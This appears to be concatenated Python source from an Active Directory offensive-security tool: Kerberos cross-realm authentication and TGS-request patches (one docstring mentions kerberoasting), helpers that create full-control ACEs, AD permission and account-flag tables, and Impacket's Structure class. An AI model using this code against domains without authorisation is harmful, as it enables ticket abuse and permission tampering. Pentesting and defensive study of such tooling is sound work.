    elif protocol == asyauthProtocol.KERBEROS:
        proxies = None
        if proxy_present is True:
            from asysocks.unicomm.common.proxy import UniProxyTarget

            proxies = UniProxyTarget.from_url_params(
                url_e.query, url_e.hostname, endpoint_port=88
            )

        target = None
        if extra["dc"] is not None:
            target = UniTarget(
                extra["dc"],
                88,
                UniProto.CLIENT_TCP,
                proxies=proxies,
                dns=params["dns"],
                dc_ip=extra["dc"],
            )

        cross_target = None
        if extra["dcc"] is not None:
            cross_target = UniTarget(
                extra["dcc"],
                88,
                UniProto.CLIENT_TCP,
                proxies=proxies,
                dns=params["dnsc"],
                dc_ip=extra["dcc"],
            )

        etypes = extra["etype"] if extra["etype"] is not None else [23, 17, 18]

        return credobj(
            secret,
            username,
            domain,
            stype,
            target=target,
            altname=extra["altname"],
            altdomain=extra["altdomain"],
            certdata=extra["certdata"],
            keydata=extra["keydata"],
            etypes=etypes,
            subprotocol=subprotocol,
            cross_target=cross_target,
            cross_realm=extra["realmc"],
        )
    else:
        return UniCredential(secret, username, domain, stype, protocol, subprotocol)


UniCredential.from_url = from_url


## Modifications "Fix crossrealm krb auth with ticket" ##
#########################################################
import datetime
from asyauth.protocols.kerberos import logger
from asyauth.common.winapi.constants import ISC_REQ
from asyauth.common.credentials.kerberos import KerberosCredential
from asyauth.protocols.kerberos.gssapi import get_gssapi, KRB5_MECH_INDEP_TOKEN
from asyauth.protocols.kerberos.gssapismb import get_gssapi as gssapi_smb
from minikerberos.common.spn import KerberosSPN
from minikerberos.gssapi.gssapi import GSSAPIFlags
from minikerberos.protocol.asn1_structs import (
    AP_REP,
    EncAPRepPart,
    Ticket,
    EncryptedData,
)
from minikerberos.protocol.constants import MESSAGE_TYPE
from minikerberos.protocol.ticketutils import construct_apreq_from_ticket
from minikerberos.protocol.encryption import Key, _enctype_table
from minikerberos.aioclient import AIOKerberosClient


async def authenticate(
    self,
    authData: bytes,
    flags: ISC_REQ = None,
    seq_number: int = 0,
    cb_data: bytes = None,
    spn: str = None,
):
    """
    This function is called (multiple times depending on the flags) to perform authentication.
    """
    try:
        self.flags = self.iscreq_to_gssapiflags(flags)
        logger.debug("Flags: %s" % self.flags)

        if spn is None:
            raise Exception("SPN is needed for kerberos!")
        else:
            spn = KerberosSPN.from_spn(spn)

        logger.debug("SPN: %s" % spn)
        if self.kc is None:
            self.kc = AIOKerberosClient(self.ccred, self.credential.target)

        if self.iterations == 0:
            self.seq_number = 0
            self.iterations += 1

            try:
                # check TGS first, maybe ccache already has what we need
                for target in self.ccred.ccache.list_targets():
                    # just printing this to debug...
                    logger.debug("CCACHE SPN record: %s" % target)
                tgs, encpart, self.session_key, err = self.kc.tgs_from_ccache(spn)
                if err:
                    raise err
                logger.debug("Got TGS from CCACHE!")

                self.from_ccache = True
            except:
                # fetching TGT
                tgt = await self.kc.get_TGT(override_etype=self.credential.etypes)
                # if the target server is in a different domain, we need to get a referral ticket
                if self.credential.cross_target is not None:
                    # cross-domain kerberos
                    ref_tgs, ref_encpart, ref_key, new_factory = (
                        await self.kc.get_referral_ticket(
                            self.credential.cross_realm,
                            self.credential.cross_target.get_ip_or_hostname(),
                        )
                    )
                    self.kc = new_factory.get_client()
                    spn.domain = self.credential.cross_realm
                tgs, encpart, self.session_key = await self.kc.get_TGS(
                    spn
                )  # , override_etype = self.preferred_etypes)

            logger.debug("TGS: %s" % tgs)
            logger.debug("encpart: %s" % encpart)
            logger.debug("session_key: %s" % self.session_key)

            ap_opts = []
            if (
                GSSAPIFlags.GSS_C_MUTUAL_FLAG in self.flags
                or GSSAPIFlags.GSS_C_DCE_STYLE in self.flags
            ):
                if GSSAPIFlags.GSS_C_MUTUAL_FLAG in self.flags:
                    ap_opts.append("mutual-required")
                if self.from_ccache is False:
                    apreq = self.kc.construct_apreq(
                        tgs,
                        encpart,
                        self.session_key,
                        flags=self.flags,
                        seq_number=self.seq_number,
                        ap_opts=ap_opts,
                        cb_data=cb_data,
                    )
                else:
                    apreq = construct_apreq_from_ticket(
                        Ticket(tgs["ticket"]).dump(),
                        self.session_key,
                        tgs["crealm"],
                        tgs["cname"]["name-string"][0],
                        flags=self.flags,
                        seq_number=self.seq_number,
                        ap_opts=ap_opts,
                        cb_data=cb_data,
                    )

                logger.debug("APREQ constructed: %s" % apreq)
                return apreq, True, None

            else:
                # not mutual nor dce auth will take one step only
                if self.from_ccache is False:
                    apreq = self.kc.construct_apreq(
                        tgs,
                        encpart,
                        self.session_key,
                        flags=self.flags,
                        seq_number=self.seq_number,
                        ap_opts=ap_opts,
                        cb_data=cb_data,
                    )
                else:
                    apreq = construct_apreq_from_ticket(
                        Ticket(tgs["ticket"]).dump(),
                        self.session_key,
                        tgs["crealm"],
                        tgs["cname"]["name-string"][0],
                        flags=self.flags,
                        seq_number=self.seq_number,
                        ap_opts=ap_opts,
                        cb_data=cb_data,
                    )

                logger.debug("APREQ constructed: %s" % apreq)
                self.gssapi = get_gssapi(self.session_key)
                return apreq, False, None

        else:
            self.seq_number = seq_number

            logger.debug("Processing AP_REP %s" % authData.hex())
            try:
                temp = KRB5_MECH_INDEP_TOKEN.from_bytes(authData)
                aprep = AP_REP.load(temp.data[2:]).native
            except Exception as e:
                aprep = AP_REP.load(authData).native

            logger.debug("AP_REP: %s" % aprep)
            cipher = _enctype_table[int(aprep["enc-part"]["etype"])]()
            cipher_text = aprep["enc-part"]["cipher"]
            temp = cipher.decrypt(self.session_key, 12, cipher_text)

            enc_part = EncAPRepPart.load(temp).native
            cipher = _enctype_table[int(enc_part["subkey"]["keytype"])]()

            now = datetime.datetime.now(datetime.timezone.utc)
            apreppart_data = {}
            apreppart_data["cusec"] = now.microsecond
            apreppart_data["ctime"] = now.replace(microsecond=0)
            apreppart_data["seq-number"] = enc_part["seq-number"]
            # print('seq %s' % enc_part['seq-number'])
            # self.seq_number = 0 #enc_part['seq-number']

            logger.debug("apreppart_data: %s" % apreppart_data)
            apreppart_data_enc = cipher.encrypt(
                self.session_key, 12, EncAPRepPart(apreppart_data).dump(), None
            )

            # overriding current session key
            self.session_key = Key(cipher.enctype, enc_part["subkey"]["keyvalue"])

            logger.debug("SessionKey: %s" % self.session_key)

            ap_rep = {}
            ap_rep["pvno"] = 5
            ap_rep["msg-type"] = MESSAGE_TYPE.KRB_AP_REP.value
            ap_rep["enc-part"] = EncryptedData(
                {"etype": self.session_key.enctype, "cipher": apreppart_data_enc}
            )

            logger.debug("AP_REP: %s" % ap_rep)
            token = AP_REP(ap_rep).dump()
            if GSSAPIFlags.GSS_C_DCE_STYLE in self.flags:
                self.gssapi = gssapi_smb(self.session_key)
            else:
                self.gssapi = get_gssapi(self.session_key)
            self.iterations += 1
            return token, True, None

    except Exception as e:
        return None, None, e


from asyauth.protocols.kerberos.client.native import KerberosClientNative

KerberosClientNative.authenticate = authenticate


# Modifications "Offer multiple etype for TGS-REQ" #
# Fix TGS req domain for crossrealm #
####################################################
from typing import List
from minikerberos import logger
from minikerberos.common.spn import KerberosSPN
from minikerberos.protocol.asn1_structs import (
    EncryptedData,
    krb5_pvno,
    KDC_REQ_BODY,
    KDCOptions,
    PrincipalName,
    EncTGSRepPart,
    PrincipalName,
    Realm,
    Checksum,
    APOptions,
    Authenticator,
    Ticket,
    AP_REQ,
    TGS_REQ,
    AP_REP,
)
from minikerberos.protocol.errors import KerberosError
from minikerberos.protocol.encryption import Key, _enctype_table
from minikerberos.protocol.constants import PaDataType, NAME_TYPE, MESSAGE_TYPE
from minikerberos.protocol.structures import AuthenticatorChecksum
from minikerberos.gssapi.gssapi import GSSAPIFlags
import datetime
import secrets


async def get_TGS(
    self,
    spn_user: KerberosSPN,
    override_etype=None,
    is_linux=False,
    flags=["forwardable", "renewable", "renewable_ok", "canonicalize"],
):
    """
    Requests a TGS ticket for the specified user.
    Retruns the TGS ticket, end the decrpyted encTGSRepPart.

    spn_user: KerberosTarget: the service user you want to get TGS for.
    override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
    """

    # first, let's check if CCACHE has the correct ticket already
    tgs, encTGSRepPart, key, err = self.tgs_from_ccache(spn_user)
    if err is None:
        return tgs, encTGSRepPart, key

    if self.kerberos_TGT is None:
        # let's check if CCACHE has a TGT for us
        _, err = self.tgt_from_ccache()
        if err is not None:
            raise Exception("No TGT found in CCACHE!")

    # nope, we need to contact the server
    logger.debug(
        "Constructing TGS request for user %s" % spn_user.get_formatted_pname()
    )
    now = datetime.datetime.now(datetime.timezone.utc)
    kdc_req_body = {}
    kdc_req_body["kdc-options"] = KDCOptions(set(flags))
    kdc_req_body["realm"] = self.kerberos_TGT["ticket"]["sname"]["name-string"][
        1
    ]  # spn_user.domain.upper()
    kdc_req_body["sname"] = PrincipalName(
        {
            "name-type": NAME_TYPE.SRV_INST.value,
            "name-string": spn_user.get_principalname(),
        }
    )
    kdc_req_body["till"] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
    kdc_req_body["nonce"] = secrets.randbits(31)
    if override_etype:
        kdc_req_body["etype"] = override_etype
    else:
        if self.kerberos_cipher_type == -128:
            # we dunno how to do GSS api calls with -128 etype,
            # but we can request etype 23 here for which all is implemented
            kdc_req_body["etype"] = [23]
        else:
            kdc_req_body["etype"] = [self.kerberos_cipher_type, 23]

    authenticator_data = {}
    authenticator_data["authenticator-vno"] = krb5_pvno
    authenticator_data["crealm"] = Realm(self.kerberos_TGT["crealm"])
    authenticator_data["cname"] = self.kerberos_TGT["cname"]
    authenticator_data["cusec"] = now.microsecond
    authenticator_data["ctime"] = now.replace(microsecond=0)

    if is_linux:
        ac = AuthenticatorChecksum()
        ac.flags = 0
        ac.channel_binding = b"\x00" * 16

        chksum = {}
        chksum["cksumtype"] = 0x8003
        chksum["checksum"] = ac.to_bytes()

        authenticator_data["cksum"] = Checksum(chksum)
        authenticator_data["seq-number"] = 0

    authenticator_data_enc = self.kerberos_cipher.encrypt(
        self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None
    )

    ap_req = {}
    ap_req["pvno"] = krb5_pvno
    ap_req["msg-type"] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req["ap-options"] = APOptions(set())
    ap_req["ticket"] = Ticket(self.kerberos_TGT["ticket"])
    ap_req["authenticator"] = EncryptedData(
        {"etype": self.kerberos_cipher_type, "cipher": authenticator_data_enc}
    )

    pa_data_1 = {}
    pa_data_1["padata-type"] = PaDataType.TGS_REQ.value
    pa_data_1["padata-value"] = AP_REQ(ap_req).dump()

    kdc_req = {}
    kdc_req["pvno"] = krb5_pvno
    kdc_req["msg-type"] = MESSAGE_TYPE.KRB_TGS_REQ.value
    kdc_req["padata"] = [pa_data_1]
    kdc_req["req-body"] = KDC_REQ_BODY(kdc_req_body)

    req = TGS_REQ(kdc_req)
    logger.debug("Constructing TGS request to server")
    rep = await self.ksoc.sendrecv(req.dump())
    if rep.name == "KRB_ERROR":
        raise KerberosError(rep, "get_TGS failed!")
    logger.debug("Got TGS reply, decrypting...")
    tgs = rep.native

    encTGSRepPart = EncTGSRepPart.load(
        self.kerberos_cipher.decrypt(
            self.kerberos_session_key, 8, tgs["enc-part"]["cipher"]
        )
    ).native
    key = Key(encTGSRepPart["key"]["keytype"], encTGSRepPart["key"]["keyvalue"])

    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug("Got valid TGS reply")
    self.kerberos_TGS = tgs
    return tgs, encTGSRepPart, key


from minikerberos.aioclient import AIOKerberosClient

AIOKerberosClient.get_TGS = get_TGS


# Fix crealm tgt/tgs decoding #
###############################
import datetime
from typing import List
from minikerberos.protocol.asn1_structs import (
    Ticket,
    EncryptedData,
    krb5_pvno,
    EncryptionKey,
)
from minikerberos.protocol.constants import MESSAGE_TYPE
from minikerberos import logger
from minikerberos.common.spn import KerberosSPN


def to_tgt(self):
    """
    Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
    """
    enc_part = EncryptedData({"etype": 1, "cipher": b""})

    tgt_rep = {}
    tgt_rep["pvno"] = krb5_pvno
    tgt_rep["msg-type"] = MESSAGE_TYPE.KRB_AS_REP.value
    tgt_rep["crealm"] = self.client.realm.to_string()
    tgt_rep["cname"] = self.client.to_asn1()[0]
    tgt_rep["ticket"] = Ticket.load(self.ticket.to_asn1()).native
    tgt_rep["enc-part"] = enc_part.native

    t = EncryptionKey(self.key.to_asn1()).native

    return tgt_rep, t


def to_tgs(self):
    """
    Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
    """
    enc_part = EncryptedData({"etype": 1, "cipher": b""})

    tgt_rep = {}
    tgt_rep["pvno"] = krb5_pvno
    tgt_rep["msg-type"] = MESSAGE_TYPE.KRB_AS_REP.value
    tgt_rep["crealm"] = self.client.realm.to_string()
    tgt_rep["cname"] = self.client.to_asn1()[0]
    tgt_rep["ticket"] = Ticket.load(self.ticket.to_asn1()).native
    tgt_rep["enc-part"] = enc_part.native

    t = EncryptionKey(self.key.to_asn1()).native

    return tgt_rep, t


from minikerberos.common.ccache import Credential

Credential.to_tgt = to_tgt
Credential.to_tgs = to_tgs



from bloodyAD.formatters import ldaptypes
import uuid


# 2.4.7 SECURITY_INFORMATION
OWNER_SECURITY_INFORMATION = 0x00000001
GROUP_SECURITY_INFORMATION = 0x00000002
DACL_SECURITY_INFORMATION = 0x00000004
SACL_SECURITY_INFORMATION = 0x00000008
LABEL_SECURITY_INFORMATION = 0x00000010
UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000
UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000
PROTECTED_SACL_SECURITY_INFORMATION = 0x40000000
PROTECTED_DACL_SECURITY_INFORMATION = 0x80000000
ATTRIBUTE_SECURITY_INFORMATION = 0x00000020
SCOPE_SECURITY_INFORMATION = 0x00000040
BACKUP_SECURITY_INFORMATION = 0x00010000

# https://docs.microsoft.com/en-us/windows/win32/api/iads/ne-iads-ads_rights_enum
ACCESS_FLAGS = {
    # Flag constants
    "GENERIC_READ": 0x80000000,
    "GENERIC_WRITE": 0x40000000,
    "GENERIC_EXECUTE": 0x20000000,
    "GENERIC_ALL": 0x10000000,
    "MAXIMUM_ALLOWED": 0x02000000,
    "ACCESS_SYSTEM_SECURITY": 0x01000000,
    "SYNCHRONIZE": 0x00100000,
    # Not in the spec but equivalent to the flags below it
    "FULL_CONTROL": 0x000F01FF,
    "WRITE_OWNER": 0x00080000,
    "WRITE_DACL": 0x00040000,
    "READ_CONTROL": 0x00020000,
    "DELETE": 0x00010000,
    # ACE type specific mask constants
    # Note that while not documented, these also seem valid
    # for ACCESS_ALLOWED_ACE types
    "ADS_RIGHT_DS_CONTROL_ACCESS": 0x00000100,
    "ADS_RIGHT_DS_CREATE_CHILD": 0x00000001,
    "ADS_RIGHT_DS_DELETE_CHILD": 0x00000002,
    "ADS_RIGHT_DS_READ_PROP": 0x00000010,
    "ADS_RIGHT_DS_WRITE_PROP": 0x00000020,
    "ADS_RIGHT_DS_SELF": 0x00000008,
}

# https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-addauditaccessobjectace
ACE_FLAGS = {
    # Flag constants
    "CONTAINER_INHERIT_ACE": 0x02,
    "FAILED_ACCESS_ACE_FLAG": 0x80,
    "INHERIT_ONLY_ACE": 0x08,
    "INHERITED_ACE": 0x10,
    "NO_PROPAGATE_INHERIT_ACE": 0x04,
    "OBJECT_INHERIT_ACE": 0x01,
    "SUCCESSFUL_ACCESS_ACE_FLAG": 0x40,
}

# see https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
ACCOUNT_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,
    "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x04000000,
    "USE_AES_KEYS": 0x8000000,
}


def createACE(sid, object_type=None, access_mask=ACCESS_FLAGS["FULL_CONTROL"]):
    nace = ldaptypes.ACE()
    nace["AceFlags"] = (
        ACE_FLAGS["CONTAINER_INHERIT_ACE"] + ACE_FLAGS["OBJECT_INHERIT_ACE"]
    )

    if object_type is None:
        acedata = ldaptypes.ACCESS_ALLOWED_ACE()
        nace["AceType"] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
    else:
        nace["AceType"] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
        acedata = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE()
        acedata["ObjectType"] = uuid.UUID(object_type).bytes_le
        acedata["InheritedObjectType"] = b""
        acedata["Flags"] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT

    acedata["Mask"] = ldaptypes.ACCESS_MASK()
    acedata["Mask"]["Mask"] = access_mask

    if type(sid) is str:
        acedata["Sid"] = ldaptypes.LDAP_SID()
        acedata["Sid"].fromCanonical(sid)
    else:
        acedata["Sid"] = sid

    nace["Ace"] = acedata
    return nace


def createEmptySD():
    sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
    sd["Revision"] = b"\x01"
    sd["Sbz1"] = b"\x00"
    sd["Control"] = 32772
    sd["OwnerSid"] = ldaptypes.LDAP_SID()
    # BUILTIN\Administrators
    sd["OwnerSid"].fromCanonical("S-1-5-32-544")
    sd["GroupSid"] = b""
    sd["Sacl"] = b""
    acl = ldaptypes.ACL()
    acl["AclRevision"] = 4
    acl["Sbz1"] = 0
    acl["Sbz2"] = 0
    acl.aces = []
    sd["Dacl"] = acl
    return sd



# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright (C) 2022 Fortra. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#

from struct import pack, unpack, calcsize


def b(data):
    if type(data) == str:
        return data.encode("latin-1")
    else:
        return bytes(data)


class Structure:
    """sublcasses can define commonHdr and/or structure.
    each of them is an tuple of either two: (fieldName, format) or three: (fieldName, ':', class) fields.
    [it can't be a dictionary, because order is important]

    where format specifies how the data in the field will be converted to/from bytes (string)
    class is the class to use when unpacking ':' fields.

    each field can only contain one value (or an array of values for *)
       i.e. struct.pack('Hl',1,2) is valid, but format specifier 'Hl' is not (you must use 2 dfferent fields)

    format specifiers:
      specifiers from module pack can be used with the same format
      see struct.__doc__ (pack/unpack is finally called)
        x       [padding byte]
        c       [character]
        b       [signed byte]
        B       [unsigned byte]
        h       [signed short]
        H       [unsigned short]
        l       [signed long]
        L       [unsigned long]
        i       [signed integer]
        I       [unsigned integer]
        q       [signed long long (quad)]
        Q       [unsigned long long (quad)]
        s       [string (array of chars), must be preceded with length in format specifier, padded with zeros]
        p       [pascal string (includes byte count), must be preceded with length in format specifier, padded with zeros]
        f       [float]
        d       [double]
        =       [native byte ordering, size and alignment]
        @       [native byte ordering, standard size and alignment]
        !       [network byte ordering]
        <       [little endian]
        >       [big endian]

      usual printf like specifiers can be used (if started with %)
      [not recommended, there is no way to unpack this]

        %08x    will output an 8 bytes hex
        %s      will output a string
        %s\\x00  will output a NUL terminated string
        %d%d    will output 2 decimal digits (against the very same specification of Structure)
        ...

      some additional format specifiers:
        :       just copy the bytes from the field into the output string (input may be string, other structure, or anything responding to __str__()) (for unpacking, all what's left is returned)
        z       same as :, but adds a NUL byte at the end (asciiz) (for unpacking the first NUL byte is used as terminator)  [asciiz string]
        u       same as z, but adds two NUL bytes at the end (after padding to an even size with NULs). (same for unpacking) [unicode string]
        w       DCE-RPC/NDR string (it's a macro for [  '<L=(len(field)+1)/2','"\\x00\\x00\\x00\\x00','<L=(len(field)+1)/2',':' ]
        ?-field length of field named 'field', formatted as specified with ? ('?' may be '!H' for example). The input value overrides the real length
        ?1*?2   array of elements. Each formatted as '?2', the number of elements in the array is stored as specified by '?1' (?1 is optional, or can also be a constant (number), for unpacking)
        'xxxx   literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
        "xxxx   literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
        _       will not pack the field. Accepts a third argument, which is an unpack code. See _Test_UnpackCode for an example
        ?=packcode  will evaluate packcode in the context of the structure, and pack the result as specified by ?. Unpacking is made plain
        ?&fieldname "Address of field fieldname".
                    For packing it will simply pack the id() of fieldname. Or use 0 if fieldname doesn't exists.
                    For unpacking, it's used to know weather fieldname has to be unpacked or not, i.e. by adding a & field you turn another field (fieldname) in an optional field.

    """

    commonHdr = ()
    structure = ()
    debug = 0

    def __init__(self, data=None, alignment=0):
        if not hasattr(self, "alignment"):
            self.alignment = alignment

        self.fields = {}
        self.rawData = data
        if data is not None:
            self.fromString(data)
        else:
            self.data = None

    @classmethod
    def fromFile(self, file):
        answer = self()
        answer.fromString(file.read(len(answer)))
        return answer

    def setAlignment(self, alignment):
        self.alignment = alignment

    def setData(self, data):
        self.data = data

    def packField(self, fieldName, format=None):
        if self.debug:
            print("packField( %s | %s )" % (fieldName, format))

        if format is None:
            format = self.formatForField(fieldName)

        if fieldName in self.fields:
            ans = self.pack(format, self.fields[fieldName], field=fieldName)
        else:
            ans = self.pack(format, None, field=fieldName)

        if self.debug:
            print("\tanswer %r" % ans)

        return ans

    def getData(self):
        if self.data is not None:
            return self.data
        data = bytes()
        for field in self.commonHdr + self.structure:
            try:
                data += self.packField(field[0], field[1])
            except Exception as e:
                if field[0] in self.fields:
                    e.args += (
                        "When packing field '%s | %s | %r' in %s"
                        % (field[0], field[1], self[field[0]], self.__class__),
                    )
                else:
                    e.args += (
                        "When packing field '%s | %s' in %s"
                        % (field[0], field[1], self.__class__),
                    )
                raise
            if self.alignment:
                if len(data) % self.alignment:
                    data += (b"\x00" * self.alignment)[: -(len(data) % self.alignment)]

        # if len(data) % self.alignment: data += ('\x00'*self.alignment)[:-(len(data) % self.alignment)]
        return data

    def fromString(self, data):
        self.rawData = data
        for field in self.commonHdr + self.structure:
            if self.debug:
                print("fromString( %s | %s | %r )" % (field[0], field[1], data))
            size = self.calcUnpackSize(field[1], data, field[0])
            if self.debug:
                print("  size = %d" % size)
            dataClassOrCode = b
            if len(field) > 2:
                dataClassOrCode = field[2]
            try:
                self[field[0]] = self.unpack(
                    field[1],
                    data[:size],
                    dataClassOrCode=dataClassOrCode,
                    field=field[0],
                )
            except Exception as e:
                e.args += (
                    "When unpacking field '%s | %s | %r[:%d]'"
                    % (field[0], field[1], data, size),
                )
                raise

            size = self.calcPackSize(field[1], self[field[0]], field[0])
            if self.alignment and size % self.alignment:
                size += self.alignment - (size % self.alignment)
            data = data[size:]

        return self

    def __setitem__(self, key, value):
        self.fields[key] = value
        self.data = None  # force recompute

    def __getitem__(self, key):
        return self.fields[key]

    def __delitem__(self, key):
        del self.fields[key]

    def __str__(self):
        return self.getData()

    def __len__(self):
        # XXX: improve
        return len(self.getData())

    def pack(self, format, data, field=None):
        if self.debug:
            print("  pack( %s | %r | %s)" % (format, data, field))

        if field:
            addressField = self.findAddressFieldFor(field)
            if (addressField is not None) and (data is None):
                return b""

        # void specifier
        if format[:1] == "_":
            return b""

        # quote specifier
        if format[:1] == "'" or format[:1] == '"':
            return b(format[1:])

        # code specifier
        two = format.split("=")
        if len(two) >= 2:
            try:
                return self.pack(two[0], data)
            except:
                fields = {"self": self}
                fields.update(self.fields)
                return self.pack(two[0], eval(two[1], {}, fields))

        # address specifier
        two = format.split("&")
        if len(two) == 2:
            try:
                return self.pack(two[0], data)
            except:
                if (two[1] in self.fields) and (self[two[1]] is not None):
                    return self.pack(
                        two[0], id(self[two[1]]) & ((1 << (calcsize(two[0]) * 8)) - 1)
                    )
                else:
                    return self.pack(two[0], 0)

        # length specifier
        two = format.split("-")
        if len(two) == 2:
            try:
                return self.pack(two[0], data)
            except:
                return self.pack(two[0], self.calcPackFieldSize(two[1]))

        # array specifier
        two = format.split("*")
        if len(two) == 2:
            answer = bytes()
            for each in data:
                answer += self.pack(two[1], each)
            if two[0]:
                if two[0].isdigit():
                    if int(two[0]) != len(data):
                        raise Exception(
                            "Array field has a constant size, and it doesn't match the"
                            " actual value"
                        )
                else:
                    return self.pack(two[0], len(data)) + answer
            return answer

        # "printf" string specifier
        if format[:1] == "%":
            # format string like specifier
            return b(format % data)

        # asciiz specifier
        if format[:1] == "z":
            if isinstance(data, bytes):
                return data + b("\0")
            return bytes(b(data) + b("\0"))

        # unicode specifier
        if format[:1] == "u":
            return bytes(data + b("\0\0") + (len(data) & 1 and b("\0") or b""))

        # DCE-RPC/NDR string specifier
        if format[:1] == "w":
            if len(data) == 0:
                data = b("\0\0")
            elif len(data) % 2:
                data = b(data) + b("\0")
            l = pack("<L", len(data) // 2)
            return b"".join([l, l, b("\0\0\0\0"), data])

        if data is None:
            raise Exception("Trying to pack None")

        # literal specifier
        if format[:1] == ":":
            if isinstance(data, Structure):
                return data.getData()
            # If we have an object that can serialize itself, go ahead
            elif hasattr(data, "getData"):
                return data.getData()
            elif isinstance(data, int):
                return bytes(data)
            elif isinstance(data, bytes) is not True:
                return bytes(b(data))
            else:
                return data

        if format[-1:] == "s":
            # Let's be sure we send the right type
            if isinstance(data, bytes) or isinstance(data, bytearray):
                return pack(format, data)
            else:
                return pack(format, b(data))

        # struct like specifier
        return pack(format, data)

    def unpack(self, format, data, dataClassOrCode=b, field=None):
        if self.debug:
            print("  unpack( %s | %r )" % (format, data))

        if field:
            addressField = self.findAddressFieldFor(field)
            if addressField is not None:
                if not self[addressField]:
                    return

        # void specifier
        if format[:1] == "_":
            if dataClassOrCode != b:
                fields = {"self": self, "inputDataLeft": data}
                fields.update(self.fields)
                return eval(dataClassOrCode, {}, fields)
            else:
                return None

        # quote specifier
        if format[:1] == "'" or format[:1] == '"':
            answer = format[1:]
            if b(answer) != data:
                raise Exception(
                    "Unpacked data doesn't match constant value '%r' should be '%r'"
                    % (data, answer)
                )
            return answer

        # address specifier
        two = format.split("&")
        if len(two) == 2:
            return self.unpack(two[0], data)

        # code specifier
        two = format.split("=")
        if len(two) >= 2:
            return self.unpack(two[0], data)

        # length specifier
        two = format.split("-")
        if len(two) == 2:
            return self.unpack(two[0], data)

        # array specifier
        two = format.split("*")
        if len(two) == 2:
            answer = []
            sofar = 0
            if two[0].isdigit():
                number = int(two[0])
            elif two[0]:
                sofar += self.calcUnpackSize(two[0], data)
                number = self.unpack(two[0], data[:sofar])
            else:
                number = -1

            while number and sofar < len(data):
                nsofar = sofar + self.calcUnpackSize(two[1], data[sofar:])
                answer.append(self.unpack(two[1], data[sofar:nsofar], dataClassOrCode))
                number -= 1
                sofar = nsofar
            return answer

        # "printf" string specifier
        if format[:1] == "%":
            # format string like specifier
            return format % data

        # asciiz specifier
        if format == "z":
            if data[-1:] != b("\x00"):
                raise Exception(
                    "%s 'z' field is not NUL terminated: %r" % (field, data)
                )
            return data[:-1].decode("latin-1")

        # unicode specifier
        if format == "u":
            if data[-2:] != b("\x00\x00"):
                raise Exception(
                    "%s 'u' field is not NUL-NUL terminated: %r" % (field, data)
                )
            return data[:-2]  # remove trailing NUL

        # DCE-RPC/NDR string specifier
        if format == "w":
            l = unpack("<L", data[:4])[0]
            return data[12 : 12 + l * 2]

        # literal specifier
        if format == ":":
            if isinstance(data, bytes) and dataClassOrCode is b:
                return data
            return dataClassOrCode(data)

        # struct like specifier
        return unpack(format, data)[0]

    def calcPackSize(self, format, data, field=None):
        #        # print "  calcPackSize  %s:%r" %  (format, data)
        if field:
            addressField = self.findAddressFieldFor(field)
            if addressField is not None:
                if not self[addressField]:
                    return 0

        # void specifier
        if format[:1] == "_":
            return 0

        # quote specifier
        if format[:1] == "'" or format[:1] == '"':
            return len(format) - 1

        # address specifier
        two = format.split("&")
        if len(two) == 2:
            return self.calcPackSize(two[0], data)

        # code specifier
        two = format.split("=")
        if len(two) >= 2:
            return self.calcPackSize(two[0], data)

        # length specifier
        two = format.split("-")
        if len(two) == 2:
            return self.calcPackSize(two[0], data)

        # array specifier
        two = format.split("*")
        if len(two) == 2:
            answer = 0
            if two[0].isdigit():
                if int(two[0]) != len(data):
                    raise Exception(
                        "Array field has a constant size, and it doesn't match the"
                        " actual value"
                    )
            elif two[0]:
                answer += self.calcPackSize(two[0], len(data))

            for each in data:
                answer += self.calcPackSize(two[1], each)
            return answer

        # "printf" string specifier
        if format[:1] == "%":
            # format string like specifier
            return len(format % data)

        # asciiz specifier
        if format[:1] == "z":
            return len(data) + 1

        # asciiz specifier
        if format[:1] == "u":
            l = len(data)
            return l + (l & 1 and 3 or 2)

        # DCE-RPC/NDR string specifier
        if format[:1] == "w":
            l = len(data)
            return 12 + l + l % 2

        # literal specifier
        if format[:1] == ":":
            return len(data)

        # struct like specifier
        return calcsize(format)

    def calcUnpackSize(self, format, data, field=None):
        if self.debug:
            print("  calcUnpackSize( %s | %s | %r)" % (field, format, data))

        # void specifier
        if format[:1] == "_":
            return 0

